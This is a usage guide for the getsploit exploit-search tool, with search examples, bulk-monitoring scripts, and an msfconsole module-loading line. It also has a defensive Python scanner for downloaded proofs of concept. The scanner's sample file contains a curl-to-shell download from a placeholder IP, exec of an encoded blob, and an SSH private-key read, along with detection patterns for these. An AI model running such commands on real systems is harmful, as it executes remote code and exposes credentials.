getsploit

getsploit is a command-line tool that searches and downloads exploit code from multiple repositories including Exploit-DB, Metasploit Framework, and Packet Storm Security. It aggregates exploit intelligence for vulnerability research and authorized penetration testing activities.

getsploit is essential for:

  • Exploit proof-of-concept research
  • Vulnerability validation and verification
  • Penetration testing and assessment
  • Exploit code adaptation and customization
  • Security research and analysis
  • Attack surface evaluation

Requirements:

  • Python 3.6+
  • pip (Python package manager)
  • Linux/macOS/Windows
  • Internet connectivity

# Install from PyPI
pip install getsploit

# Verify installation
getsploit -V
getsploit --help

# Clone repository
git clone https://github.com/vulhub/getsploit.git
cd getsploit

# Install dependencies
pip install -r requirements.txt

# Run directly
python -m getsploit --help

# Or install locally
pip install -e .

# Update to latest version
pip install --upgrade getsploit

# Check version
getsploit --version

| Command | Purpose | Example |
|---|---|---|
| getsploit <query> | Search for exploits | getsploit apache 2.4.49 |
| getsploit -h | Show help | getsploit -h |
| getsploit -V | Show version | getsploit -V |
| getsploit --update | Update exploit database | getsploit --update |

| Option | Purpose | Example |
|---|---|---|
| -e, --edb | Search Exploit-DB only | getsploit -e "CVE-2021-1234" |
| -m, --msf | Search Metasploit only | getsploit -m "windows privilege" |
| -p, --pst | Search Packet Storm only | getsploit -p "php vulnerability" |
| -t, --type | Filter by exploit type | getsploit -t "remote" apache |

# Search all repositories
getsploit apache 2.4.49

# Search by CVE number
getsploit CVE-2021-44228

# Search by application
getsploit wordpress

# Search by vulnerability type
getsploit "remote code execution"

# Search Exploit-DB only
getsploit -e "nginx privilege escalation"

# Search Metasploit only
getsploit -m "windows domain privilege"

# Search Packet Storm only
getsploit -p "php injection"

# Find remote code execution exploits
getsploit -t "remote" "apache"

# Find local privilege escalation
getsploit -t "local" "kernel"

# Find denial of service
getsploit -t "dos" "dns"

# SQL injection exploits
getsploit "sql injection" wordpress

# Cross-site scripting
getsploit "xss" "drupal"

# Path traversal
getsploit "path traversal" php

# Command injection
getsploit "command injection" web

# WordPress vulnerabilities
getsploit wordpress

# Drupal exploits
getsploit drupal

# Apache web server
getsploit apache

# PHP framework vulnerabilities
getsploit laravel

# Windows privilege escalation
getsploit -t "local" "windows"

# Linux kernel exploits
getsploit -t "local" "linux kernel"

# macOS vulnerabilities
getsploit -t "remote" "macos"

# Combine application and version
getsploit "apache 2.4.49"

# With vulnerability type
getsploit "wordpress 5.0 remote"

# Application and CVE
getsploit "wordpress CVE-2020"

# Log4j vulnerability (widespread)
getsploit CVE-2021-44228

# WordPress plugin vulnerability
getsploit CVE-2020-6450

# Kernel privilege escalation
getsploit CVE-2021-22555

# All Struts vulnerabilities
getsploit "apache struts"

# Tomcat exploits
getsploit "tomcat"

# Node.js vulnerabilities
getsploit "node.js" -t "remote"

# Search returns exploit information
getsploit apache 2.4.49

# Output shows:
# - Exploit ID
# - Title
# - Type
# - Link to code
# - Source repository

# Search with verbose output
getsploit -v apache 2.4.49

# Review exploit information before download
# - Author
# - Verification status
# - Last updated date

# Redirect output to file
getsploit wordpress > wordpress_exploits.txt

# Save specific results
getsploit -e "sql injection" > edb_sqli.txt

# Parse results programmatically (-i: identifiers such as CVE-... are usually upper-case)
getsploit apache 2.4.49 | grep -oiE "exploit-[0-9]+|cve-[0-9-]+"

# 1. Identify target technology
# Example: WordPress 5.0 running

# 2. Search for known vulnerabilities
getsploit "wordpress 5.0"

# 3. Review exploit types
getsploit -e "wordpress 5.0" | grep -i "plugin\|theme"

# 4. Download promising exploits
# (Follow links from search results)

# 5. Analyze code for applicability
# (Test in lab environment first)

# 1. Identify CVE
# Example: CVE-2021-44228 (Log4j)

# 2. Find exploits
getsploit CVE-2021-44228

# 3. Search specific sources
getsploit -m CVE-2021-44228    # Metasploit modules
getsploit -e CVE-2021-44228    # Exploit-DB POCs

# 4. Select appropriate exploit
# (Choose by platform, method, complexity)

# 1. Identify running application
# Example: Apache Struts 2.0

# 2. Search comprehensively
getsploit "apache struts"

# 3. Filter by vulnerability type
getsploit -t "remote" "apache struts"

# 4. Research by year
getsploit "struts 2009"  # Earlier vulnerabilities
getsploit "struts 2017"  # More recent exploits

# Find exploit in Metasploit
getsploit -m "apache struts"

# Get module path from results
# Load in msfconsole (-x runs console commands; -m only adds a module search path)
msfconsole -x "use exploit/linux/http/apache_struts_rce"

# Alternative: Use searchsploit (locally cached)
searchsploit "apache struts"

# Cross-reference with getsploit
# (-F: treat searchsploit's output lines as fixed strings, not regular expressions)
getsploit "apache struts" | grep -vF "$(searchsploit -t apache struts)"

# Save organized results
mkdir -p exploit_research/wordpress
getsploit wordpress > exploit_research/wordpress/search_results.txt

mkdir -p exploit_research/drupal
getsploit drupal > exploit_research/drupal/search_results.txt

# Create index
echo "# Exploit Research Results" > exploit_research/README.md

# Remote code execution
getsploit -t "remote" "application"

# Privilege escalation
getsploit -t "local" "privilege"

# Denial of service
getsploit -t "dos" "service"

# Authentication bypass
getsploit "authentication bypass" app

# Search for verified/tested exploits
getsploit -e "apache"        # Exploit-DB (verified)

# Search for modules
getsploit -m "wordpress"     # Metasploit (tested)

# Review multiple sources
getsploit -p "wordpress"     # Packet Storm (research)

# Recently added exploits
getsploit -e "2024" wordpress

# Older, battle-tested exploits
getsploit -e "2015" linux

# Compare exploit counts
getsploit -m "apache" | wc -l
getsploit -e "apache" | wc -l

#!/bin/bash
# Search for exploits for multiple CVEs

CVES=(
  "CVE-2021-44228"
  "CVE-2021-22555"
  "CVE-2020-1938"
)

OUTPUT_DIR="cve_research"
mkdir -p "$OUTPUT_DIR"

for cve in "${CVES[@]}"; do
  echo "Researching $cve..."
  getsploit "$cve" > "$OUTPUT_DIR/${cve}_results.txt"
  
  # Count exploits found
  COUNT=$(wc -l < "$OUTPUT_DIR/${cve}_results.txt")
  echo "$cve: $COUNT results found"
done

#!/bin/bash
# Build database of exploits for target technologies

TARGETS=(
  "wordpress"
  "drupal"
  "joomla"
  "apache"
  "nginx"
)

DB_DIR="exploit_database"
mkdir -p "$DB_DIR"

for target in "${TARGETS[@]}"; do
  echo "Building database for $target..."
  
  # Search all sources
  getsploit -e "$target" > "$DB_DIR/${target}_edb.txt"
  getsploit -m "$target" > "$DB_DIR/${target}_msf.txt"
  getsploit -p "$target" > "$DB_DIR/${target}_pst.txt"
  
  # Create summary
  TOTAL=$(($(wc -l < "$DB_DIR/${target}_edb.txt") + \
           $(wc -l < "$DB_DIR/${target}_msf.txt") + \
           $(wc -l < "$DB_DIR/${target}_pst.txt")))
  
  echo "$target: $TOTAL exploits indexed"
done

#!/bin/bash
# Monitor new exploits for critical applications

MONITOR_TARGETS=(
  "wordpress"
  "apache"
  "openssh"
)

RESULTS_DIR="vulnerability_monitoring"
mkdir -p "$RESULTS_DIR"

DATE=$(date +%Y%m%d)

for target in "${MONITOR_TARGETS[@]}"; do
  LATEST_FILE="$RESULTS_DIR/${target}_latest.txt"
  CURRENT_FILE="$RESULTS_DIR/${target}_${DATE}.txt"
  
  # Get current exploits
  getsploit "$target" | sort > "$CURRENT_FILE"
  
  # Compare with previous
  if [ -f "$LATEST_FILE" ]; then
    NEW_EXPLOITS=$(comm -13 "$LATEST_FILE" "$CURRENT_FILE")
    if [ -n "$NEW_EXPLOITS" ]; then
      echo "New exploits for $target:"
      echo "$NEW_EXPLOITS"
    fi
  fi
  
  # Update latest
  cp "$CURRENT_FILE" "$LATEST_FILE"
done

# Extract exploit IDs
getsploit apache | grep -oE "EDB-[0-9]+" | sort -u

# Extract CVE references
getsploit wordpress | grep -oE "CVE-[0-9-]+" | sort -u

# Count results by type
getsploit apache | grep -c "remote"
getsploit apache | grep -c "local"

# Find exploits in Exploit-DB
getsploit -e wordpress > edb_wp.txt

# Find exploits in Metasploit
getsploit -m wordpress > msf_wp.txt

# Find unique to Exploit-DB
comm -23 <(sort edb_wp.txt) <(sort msf_wp.txt)

# Find in all sources
getsploit wordpress | sort -u > all_wp.txt
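As an added example (not part of getsploit or of the original page), the CVE extraction and snapshot comparison above can be tightened for defensive prioritization: the Python below keeps only well-formed CVE IDs from saved results and reports which CVEs from an asset inventory gained public exploit references since the previous snapshot. The snapshot lines, the inventory and all function names are constructed for illustration.

```python
import re
from collections import defaultdict

# A CVE ID is "CVE-<4-digit year>-<4+ digit sequence>". The looser
# CVE-[0-9-]+ also accepts fragments such as "CVE-2020" or "CVE-2021-".
CVE_RE = re.compile(r"\bCVE-(\d{4})-(\d{4,})\b", re.IGNORECASE)


def references_by_cve(results_text):
    """Map each well-formed CVE ID (upper-cased) to the result lines citing it."""
    refs = defaultdict(list)
    for line in results_text.splitlines():
        for year, seq in CVE_RE.findall(line):
            refs[f"CVE-{year}-{seq}"].append(line.strip())
    return dict(refs)


def newly_referenced(previous_text, current_text, inventory):
    """Inventory CVEs cited in the current snapshot but not in the previous one."""
    fresh = set(references_by_cve(current_text)) - set(references_by_cve(previous_text))
    return sorted(fresh & {cve.upper() for cve in inventory})


# Constructed snapshots; only the CVE tokens matter, the line layout is made up.
PREVIOUS = """\
Example Server 1.0 - Information Disclosure (CVE-2020-1938)
wordpress CVE-2020 search note
"""
CURRENT = PREVIOUS + """\
Example Logger - JNDI lookup RCE (cve-2021-44228)
Example Logger - alternate PoC for CVE-2021-44228
Example Kernel - local privilege escalation CVE-2021-22555
"""
# Hypothetical asset inventory: CVEs a scanner reports as unpatched.
INVENTORY = ["CVE-2021-44228", "CVE-2020-1938", "CVE-2020-6450"]

if __name__ == "__main__":
    current_refs = references_by_cve(CURRENT)
    for cve in newly_referenced(PREVIOUS, CURRENT, INVENTORY):
        print(cve, "->", len(current_refs[cve]), "public reference(s)")
```

CVEs returned by `newly_referenced` are the ones to move up the patch queue, since exploit code for them has just become publicly indexed.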
  • Verify applicability: Confirm vulnerability affects target before exploitation
  • Test in isolated lab: Always test in controlled environment first
  • Review exploit code: Analyze code for malicious intent before execution
  • Maintain documentation: Track exploit usage for reporting
  • Only test authorized targets: Ensure proper authorization before testing
  • Keep audit trail: Document all exploit testing activities
  • Update regularly: Keep exploit database current with --update
  • Use specific terms: More specific searches yield relevant results
  • Include version numbers: Narrow results with application versions
  • Cross-reference CVEs: Verify CVE numbers with multiple sources
  • Search all repositories: Different sources contain unique exploits
  • Review metadata: Check author, date, and verification status
  • Compare multiple exploits: Select most reliable implementation
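One way to apply the "Review exploit code" practice, shown as an added example rather than code from getsploit or the original page: a heuristic pre-read that flags lines in a downloaded proof of concept that a reviewer should inspect before running it, even in a lab. The rules, the function name and the sample file are assumptions constructed for this example, and a clean result does not replace reading the code.

```python
import re

# Heuristic review rules (assumptions of this example, not a complete list).
RULES = [
    ("decode-and-exec", re.compile(r"\b(exec|eval)\s*\(.*(b64decode|fromhex|decompress)", re.I)),
    ("pipe-to-shell", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I)),
    ("credential-access", re.compile(r"\.ssh/id_[a-z0-9]+|/etc/shadow|\.aws/credentials", re.I)),
    ("opaque-blob", re.compile(r"[A-Za-z0-9+/=]{120,}")),
]


def triage(source):
    """Return (line_number, rule, text) for each line a reviewer should read first."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((lineno, name, line.strip()[:80]))
    return findings


# Constructed sample: a "PoC" whose banner hides behaviour unrelated to the bug.
# It is only ever scanned as text here, never executed; the IP is a
# documentation address (TEST-NET-2).
SAMPLE_POC = "\n".join([
    "#!/usr/bin/env python3",
    "# Exploit Title: Example App 1.0 - Remote Code Execution (constructed)",
    "import base64, os",
    "PAYLOAD = '" + "QUJD" * 40 + "'",
    "exec(base64.b64decode(PAYLOAD))",
    "os.system('curl -s http://198.51.100.7/i.sh | sh')",
    "open(os.path.expanduser('~/.ssh/id_rsa')).read()",
    "print('[+] target is vulnerable')",
])

if __name__ == "__main__":
    for lineno, rule, text in triage(SAMPLE_POC):
        print(f"line {lineno}: {rule}: {text}")
```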
| Issue | Solution |
|---|---|
| No results found | Try broader search terms or different keywords |
| Connection errors | Check internet connectivity; verify target is accessible |
| Old database | Run getsploit --update to refresh exploit database |
| Exploit not found | Try searching by CVE number or different terms |
| Metasploit results | Verify Metasploit Framework installation for module paths |

# Update exploit database
getsploit --update

# Schedule regular updates (cron): daily at midnight
0 0 * * * /usr/local/bin/getsploit --update

getsploit aggregates exploit intelligence from multiple authoritative sources:

  1. Exploit-DB - Largest public exploit repository
  2. Metasploit Framework - Professional exploitation platform
  3. Packet Storm Security - Historical vulnerability research

Key capabilities include:

  • Multi-repository exploit searching
  • Flexible filtering by type and source
  • CVE-based vulnerability research
  • Integration with exploitation frameworks
  • Automated vulnerability monitoring

Use getsploit to research known vulnerabilities, validate attack vectors, and build exploit collections for authorized penetration testing and security assessment activities.